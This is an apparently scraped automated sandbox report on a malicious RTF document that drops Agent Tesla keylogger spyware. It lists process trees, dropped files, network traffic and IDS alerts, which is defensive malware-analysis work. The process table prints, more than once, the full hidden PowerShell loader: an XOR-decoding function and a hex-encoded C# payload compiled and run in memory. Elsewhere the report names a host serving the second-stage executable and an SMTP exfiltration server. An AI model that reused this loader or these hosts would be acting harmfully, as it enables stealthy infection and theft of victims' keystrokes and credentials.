File name: | f104741a844a97e19cb0911e5cf55fbc056dd5eb792265b4d805f5a24d1b7bc1 |
Full analysis: | https://app.any.run/tasks/86ce00aa-f7d8-4b77-ba39-e91017fef6c8 |
Verdict: | Malicious activity |
Threats: | Agent Tesla is spyware that collects information about its victims' actions by recording keystrokes and user interactions. It is falsely marketed as legitimate software on the dedicated website where the malware is sold. |
Analysis date: | September 11, 2019, 07:51:29 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | E6A8477BB74C41BC0F0D3B6D9A2AB2CB |
SHA1: | B5FCE17ABA811392189F14994C285D1EE34E958B |
SHA256: | F104741A844A97E19CB0911E5CF55FBC056DD5EB792265B4D805F5A24D1B7BC1 |
SSDEEP: | 12288:PP8tuP8tuP8tuP8tuP8tuP8tuP8tuP8tuP8tuP8tuP8tuP8t4:stZtZtZtZtZtZtZtZtZtZtZt4 |
.rtf | | | Rich Text Format (100) |
---|
InternalVersionNumber: | 57435 |
---|---|
CharactersWithSpaces: | 4 |
Characters: | 4 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
RevisionNumber: | 1 |
ModifyDate: | 2019:01:07 23:54:00 |
CreateDate: | 2019:01:07 23:54:00 |
LastModifiedBy: | Admin |
Author: | Admin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3600 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f104741a844a97e19cb0911e5cf55fbc056dd5eb792265b4d805f5a24d1b7bc1.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2596 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2412 | powershell -WindowStyle Hidden function y483723 { param($lc8939f) $v7e1d4 = 'vfb6f4';$r8bfca = ''; for ($i = 0; $i -lt $lc8939f.length; $i+=2) { $k7edf8 = [convert]::ToByte($lc8939f.Substring($i, 2), 16); $r8bfca += [char]($k7edf8 -bxor $v7e1d4[($i / 2) % $v7e1d4.length]); } return $r8bfca; } $c916ec = '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'; $c916ec2 = y483723($c916ec); Add-Type -TypeDefinition $c916ec2; [m173fe]::t6a5f2(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
876 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2252 | powershell -WindowStyle Hidden function y483723 { param($lc8939f) $v7e1d4 = 'vfb6f4';$r8bfca = ''; for ($i = 0; $i -lt $lc8939f.length; $i+=2) { $k7edf8 = [convert]::ToByte($lc8939f.Substring($i, 2), 16); $r8bfca += [char]($k7edf8 -bxor $v7e1d4[($i / 2) % $v7e1d4.length]); } return $r8bfca; } $c916ec = '03150b580114251f114203594d13115f085356351b4512511b48304308401f0b07182f5a0203105916671314145f0551055d17450f5a1146314f1540130b4c720f5511080d45125d15155943155d180142651f4702030f182f7b4d13115f085356351b4512511b482c53120f7b6c124304581f0542550a550515425b57034500074d3d701a0a2b5b165b04124a140d510408075a5506544a275812460f360d5f08404b442553126404090177025004031145441d2b46124304581f0542451255020f0116034c02031058467d18123242141410045153521c3f08166612465600545550514e544e4512461f0805160e0d125355024f0f2d220e5a2f59060910424e161d03105803584554401a46711812104f365b1f0816165b14542a0d5702781f041057144d544f3f161641140a0b5546470207165f0514131e1653145a562f0c423640044607535e50104e1142145d180142415f5015024b0d3d701a0a2b5b165b04124a140d510408075a5506544a42730840041f32590f5a025b40600f460213035a36461912075512165f3b424613561a0f0116154017120b5546510e120744081414090d5a4659455f0003511c3f0816661246561351020402104a377f0840261210161e511455061a46411f08161608011350565205185609174246411f081616095617050400021d4d3d265a0a7d1b160d44121c542d074408511a55501802581a444e16235a02141b66095d18125f1434401a2b0d400379130b0d441f165a463153127817151673144619145f50075805034b6b46470207165f0514131e1653145a56100d5f02140653550e530d5e2f0c423640044604530405444a2b58126402144245550045544e5f08405614010e53065f5d124304581f0542451255020f01160f5a02461600070110544a1f1d7d1812324214141a5406525e07565b4253030c12004a4f520c455150054e164751525457054300560e530447075257441d5f5d0b504e584402060e55094b2f0c42364004483853145b5f1d0559125b5602030e5e561253594b2f5a02361644465a4e070300040910045153521c1a5406525e075a1f560e550344554a145503460453075352455357015703465e500652074656570457074752401f4f0f1f004a585e551750000b5b7d18123242141a2c0310594f4f11091659
4650175e5a5402014d1b377f0840261210160c504005560f5b1c232f0c423640044f570d135d181242575206455f5f065d5d104e435b550d1453551e080c170754544a5e125001025f18461e56064a5b031242575206455f4b1f1d5319120d1602554e5e0052530f0b241b42036f2b46010554071200560b1d040e55531a564c10004e061e0d461b597f0840261210160d00140254075b791714115e075858270e5a09573e210e5904551a4e511f5d791714115e075858250d461f1c155550050252424a521a0d00140254074a075f5d1203510c435f4a580343562f0c423640044e0c0e075540044c62097d181254024e1d5d561a065605144f4e5d52561250531a551d4d02030e5e5612535816315114250e5f035a0246075307004f535f5803435631075425581f030c424e1d4d1516440f5a11460057570d435b2758105d04090c5b035a024825531272190a0653146417120a1e235a000f1059085913081618354413050b570a72190a0653141a3716125a0f5717120b5908701712031f4d162a3a0c0350054f5404144d4d425e510154075e44570e560747075705441d4d030757520d43482659115a1a090352205d1a034a4f520c455150054e16470353045702425057555756435f520256504352520252504753525356564205560e5204475f530052504250530253564756520f5704430452015756470552505650430252055305435e520557554355401f4a5617575b034f0f26140d5503470535165714403f080459465c430703050209180315163646190507451567020710422f5a10094a5407054f534b0d364619050745151a25120344121c1e53035755505f5d10531241040842065d490613005a0f5756151657125d15461142145d1801424f520c455150054e4702140b58011400035100041d0d1516440f5a114604000502135e500b44421004545052164d1516440f5a114607535e50105b3142145d18014c730b44021f595009465e0f0c42465d4b56595f5a42135554544878130805420e0f1f4d5f044f4f141f16534652145507025b7719081453144058320d741f40134e1453550214483143044702140b58011c1f4a501f4a05404f5953030c1200490b4e571e07101f4e5214550702466a5600545550514e54391e0f1b444f42134652400554535e06582a075801401e3b4b0d1b4613121744081413035a52000f0b1b'; $c916ec2 = y483723($c916ec); Add-Type -TypeDefinition $c916ec2; [m173fe]::t6a5f2(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2776 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\tl6fa_gt.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3328 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2464 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESAF41.tmp" "c:\Users\admin\AppData\Local\Temp\CSCAF40.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
2280 | powershell -WindowStyle Hidden function y483723 { param($lc8939f) $v7e1d4 = 'vfb6f4';$r8bfca = ''; for ($i = 0; $i -lt $lc8939f.length; $i+=2) { $k7edf8 = [convert]::ToByte($lc8939f.Substring($i, 2), 16); $r8bfca += [char]($k7edf8 -bxor $v7e1d4[($i / 2) % $v7e1d4.length]); } return $r8bfca; } $c916ec = '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'; $c916ec2 = y483723($c916ec); Add-Type -TypeDefinition $c916ec2; [m173fe]::t6a5f2(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2884 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\1c-lkavx.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3600 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9F04.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2596 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA608.tmp.cvr | — | |
MD5:— | SHA256:— | |||
876 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRABD5.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2412 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OQFXVHJZ0DXFVHYFW525.temp | — | |
MD5:— | SHA256:— | |||
3328 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRAE55.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2776 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCAF40.tmp | — | |
MD5:— | SHA256:— | |||
2776 | csc.exe | C:\Users\admin\AppData\Local\Temp\tl6fa_gt.pdb | — | |
MD5:— | SHA256:— | |||
2252 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XKMNKAHBTXFBIU3EGQ7P.temp | — | |
MD5:— | SHA256:— | |||
2464 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESAF41.tmp | — | |
MD5:— | SHA256:— | |||
2776 | csc.exe | C:\Users\admin\AppData\Local\Temp\tl6fa_gt.dll | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4052 | iexplore.exe | GET | 302 | 2.19.38.59:80 | http://go.microsoft.com/fwlink/?LinkId=57426&Ext=DS_Store | unknown | — | — | whitelisted |
4052 | iexplore.exe | GET | 301 | 2.16.186.27:80 | http://shell.windows.com/fileassoc/fileassoc.asp?Ext=DS_Store | unknown | — | — | whitelisted |
3452 | n56192f.exe | GET | 200 | 18.214.132.216:80 | http://checkip.amazonaws.com/ | US | text | 15 b | shared |
2412 | powershell.exe | GET | 200 | 162.144.128.116:80 | http://bobbychiz.top/proforma/jiokee.exe | US | executable | 673 Kb | malicious |
3624 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4052 | iexplore.exe | 204.79.197.200:443 | www.bing.com | Microsoft Corporation | US | whitelisted |
4052 | iexplore.exe | 2.16.186.27:80 | shell.windows.com | Akamai International B.V. | — | whitelisted |
2412 | powershell.exe | 162.144.128.116:80 | bobbychiz.top | Unified Layer | US | malicious |
3624 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3624 | iexplore.exe | 204.79.197.200:443 | www.bing.com | Microsoft Corporation | US | whitelisted |
4052 | iexplore.exe | 2.19.38.59:80 | go.microsoft.com | Akamai International B.V. | — | whitelisted |
3452 | n56192f.exe | 18.214.132.216:80 | checkip.amazonaws.com | — | US | shared |
3452 | n56192f.exe | 159.253.148.204:587 | mail.sigmatransport.ma | SoftLayer Technologies Inc. | NL | malicious |
4052 | iexplore.exe | 40.90.137.127:443 | login.live.com | Microsoft Corporation | US | unknown |
Domain | IP | Reputation |
---|---|---|
bobbychiz.top | | malicious |
www.bing.com | | whitelisted |
go.microsoft.com | | whitelisted |
shell.windows.com | | whitelisted |
login.live.com | | whitelisted |
checkip.amazonaws.com | | shared |
mail.sigmatransport.ma | | malicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
2412 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 |
2412 | powershell.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
2412 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2412 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2412 | powershell.exe | Misc activity | ET INFO Possible EXE Download From Suspicious TLD |
3452 | n56192f.exe | A Network Trojan was detected | MALWARE [PTsecurity] AgentTesla IP Check |
3452 | n56192f.exe | A Network Trojan was detected | AV TROJAN Win.Keylogger.AgentTesla variant outbound SMTP connection |
3452 | n56192f.exe | A Network Trojan was detected | MALWARE [PTsecurity] Trojan-Spy.Keylogger.AgentTesla Exfiltration by SMTP |
Process | Message |
---|---|
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |